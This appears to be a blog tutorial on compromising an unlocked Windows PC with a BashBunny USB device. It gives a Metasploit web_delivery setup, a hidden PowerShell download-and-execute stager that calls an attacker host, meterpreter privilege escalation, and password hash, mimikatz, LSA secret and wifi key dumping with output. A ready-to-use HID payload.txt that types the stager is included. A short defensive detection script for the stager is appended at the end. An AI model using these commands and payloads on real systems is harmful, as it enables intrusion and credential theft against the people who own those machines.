
own a windows system with BashBunny

With the setup from the previous article done, it's time to do the cool stuff and find a practical application for the bunny.

Some useful information about using the bunny:

Access to the USB storage can be done via: /.../
Useful bunny commands (LED, etc.) can be found at: /usr/local/bunny/bin/

For legal reasons, I will not describe bunny actions that work even if the screen is locked. So in all the activities below, the screen must be unlocked by its legitimate user with his own credentials. ;-)

I've tried a "get windows system" approach to enumerate everything that is possible/practicable on the host the bunny is plugged into:

Just start with:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set LHOST 172.16.64.1
msf exploit(web_delivery) > set LPORT 4444
msf exploit(web_delivery) > set target 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > exploit
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.64.1:4444
[*] Using URL: http://0.0.0.0:8080/L9AmamxWK0fGU
[*] Local IP: http://172.16.64.1:8080/L9AmamxWK0fGU
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $D=new-object net.webclient;$D.proxy=[Net.WebRequest]::GetSystemWebProxy();$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');

Now run the command below on the host the bunny is plugged into.
Later we'll put this into the HID attack:

powershell.exe -nop -w hidden -c $D=new-object net.webclient;$D.proxy=[Net.WebRequest]::GetSystemWebProxy();$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');

Back in the metasploit shell you will see:

[*] Sending stage (957487 bytes) to 172.16.64.64
[*] Meterpreter session 1 opened (172.16.64.1:4444 -> 172.16.64.64:65282) at 2017-06-02 11:38:36 -0700

To gain access to the shell:

msf > sessions -i 1

meterpreter > getuid

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid
Server username: NT-AUTORITÄT\SYSTEM


meterpreter > sysinfo
Computer : ENG-MPAULI
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : de_DE
Domain : CCS-CDC
Logged On Users : 4
Meterpreter : x86/windows

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 24cbb33d297c3b41128881[edited]...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

mpauli:"<Password hint>"

[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:72f2d4be0b2[edited]:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73[edited]:::
mpauli:1000:aad3b435b51404eeaad3b435b51404ee:72f2d4be0b2abeec[edited]:::
SophosSAUENG-MPAULI0:1013:aad3b435b51404eeaad3b435b51404ee[edited]:::
___VMware_Conv_SA___:1033:aad3b435b51404eeaad3b435b51404ee:1d[edited]:::
postgres:1035:aad3b435b51404eeaad3b435b51404ee:72f2d4be0b2abe[edited]:::

meterpreter > load kiwi
Loading extension kiwi...

.#####. mimikatz 2.1.1-20170409 (x86/windows)
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' Ported to Metasploit by OJ Reeves `TheColonial` * * */

[!] Loaded x86 Kiwi on an x64 architecture.

success.


meterpreter > kerberos
meterpreter > run enum_chrome -m
meterpreter > run get_application_list
[still a ToDo]

meterpreter > wifi_list

Intel(R) Dual Band Wireless-AC 8260 - {6136617b-3138-3632-382d-663837352d34}
============================================================================

Name       Auth     Type        Shared Key
----       ----     ----        ----------
Bad!Net    WPA2PSK  passPhrase  [edited]

meterpreter > lsa_dump_secrets
[+] Running as SYSTEM
[*] Dumping LSA secrets
Domain : [edited]
SysKey : [edited]297c3b41128881292a7f3a56

Local name : [edited] ( S-1-5-21-2998780121-3448037615-3415097299 )
Domain name : [edited] ( S-1-5-21-2371561235-1912312394-1895229363 )
Domain FQDN : [edited]

Policy subsystem is : 1.11
LSA Key(s) : 1, default {[edited]-3a7a-19ee-027f-0c4a15b67901}
[00] {[edited]-3a7a-19ee-027f-0c4a15b67901} b0a01650aa0305e9c24c7cc3ed31bbd5b78c0cc32df595c022a1004401f68368

Secret : $MACHINE.ACC

Side note: the same can be done with the standalone MimiKatz 2.0 binary instead of the kiwi extension (the lsa_dump_secrets output continues below):

meterpreter> execute -H -i -c -m -d calc.exe -f mimikatz.exe -a '"sekurlsa::logonPasswords full" exit'

[still a ToDo]

Secret : DefaultPassword

Secret : DPAPI_SYSTEM

Secret : NL$KM

Secret : _SC_pgAgent / service 'pgAgent' with username : .\postgres
cur/text: [edited]

meterpreter > run scraper
[*] New session on 172.16.64.64:6017...
[*] Gathering basic system information...
[-] Failed to run command net view
[-] Error: Rex::TimeoutError Operation timed out.
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Users\[edited]\AppData\Local\Temp\ratAKnvq.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Users\[edited]\AppData\Local\Temp\USNwplss.reg)

All the scraper logs are written to /root/.msf4/logs/scripts/scraper/ and can be copied over to ....

The payload to accomplish the above:

Save the text below as payload.txt in your switch directory:

#!/bin/bash
# Set the keyboard layout (German in my case); this must correspond to the attacked machine's keyboard layout
DUCKY_LANG us


# Reverse shell part: call your (not yet running) meterpreter handler
ATTACKMODE HID
LED B
Q GUI R
Q DELAY 100
Q STRING powershell.exe -nop -w hidden -c $D=new-object net.webclient;\
$D.proxy=[Net.WebRequest]::GetSystemWebProxy();\
$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;\
IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');
Q DELAY 100
Q ENTER
# Now spin up Metasploit


LED STAGE1
ATTACKMODE RNDIS_ETHERNET
# Set the current time (the bunny has no RTC) ... check your watch
date -s "20170523 23:23"
LED ATTACK
/root/metasploit-framework/msfconsole -r /root/metasploit-framework/eternal-cmd.rc &
LED FINISH
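From the defender's side, the stager typed by the HID payload and the manual run earlier leave the same trace on the host: a single powershell.exe process-creation event whose command line combines a hidden window, a WebClient download and IEX. The following detection rule is an added example, not part of the original post; the events are constructed, simplified Sysmon-style records and the field names ts/parent/cmd are assumptions.

```python
import re

# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields, not real logs).
# The first command line is the web_delivery stager from this page; the others are benign look-alikes.
SAMPLE_EVENTS = [
    {"ts": "2017-06-02T11:38:30", "parent": "explorer.exe",   # Win+R launches via explorer
     "cmd": "powershell.exe -nop -w hidden -c $D=new-object net.webclient;"
            "$D.proxy=[Net.WebRequest]::GetSystemWebProxy();"
            "$D.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
            "IEX $D.downloadstring('http://172.16.64.1:8080/L9AmamxWK0fGU');"},
    {"ts": "2017-06-02T11:40:01", "parent": "cmd.exe",
     "cmd": "powershell.exe -NoProfile -File C:\\ops\\backup.ps1"},
    {"ts": "2017-06-02T11:41:12", "parent": "explorer.exe",
     "cmd": "powershell.exe -w hidden -c Get-Date"},
]

# Each indicator is one trait of the stager. A single trait is common in admin tooling;
# the combination (hidden window + HTTP download + in-memory execution) almost never is.
INDICATORS = {
    "no_profile":         re.compile(r"(?<![\w-])-nop(rofile)?\b", re.I),
    "hidden_window":      re.compile(r"(?<![\w-])-w(indowstyle)?\s+h(idden)?\b", re.I),
    "inline_command":     re.compile(r"(?<![\w-])-c(ommand)?\s", re.I),
    "download_cradle":    re.compile(r"net\.webclient.*?download(string|file|data)", re.I | re.S),
    "in_memory_exec":     re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "system_proxy_creds": re.compile(r"GetSystemWebProxy.*DefaultCredentials", re.I | re.S),
}

def matched_indicators(cmd):
    """Return the names of all stager traits present in a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def is_download_cradle(cmd):
    """Fire only when code is fetched over HTTP AND executed in memory AND the window is hidden,
    so a lone '-w hidden' or a scripted file download does not alert."""
    hits = set(matched_indicators(cmd))
    return {"download_cradle", "in_memory_exec", "hidden_window"} <= hits

def stager_url(cmd):
    """Extract the URL handed to the download call, for blocking or pivoting into proxy logs."""
    m = re.search(r"download(?:string|file|data)\(\s*['\"]([^'\"]+)['\"]", cmd, re.I)
    return m.group(1) if m else None

def detect(events):
    """Run the rule over process-creation events; report time, parent and URL for each hit."""
    return [{"ts": ev["ts"], "parent": ev["parent"], "url": stager_url(ev["cmd"]),
             "indicators": matched_indicators(ev["cmd"])}
            for ev in events if is_download_cradle(ev["cmd"])]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Because the stager routes through the system proxy with the user's default credentials, the same URL also appears in the egress proxy log, which gives a second, host-independent place to look.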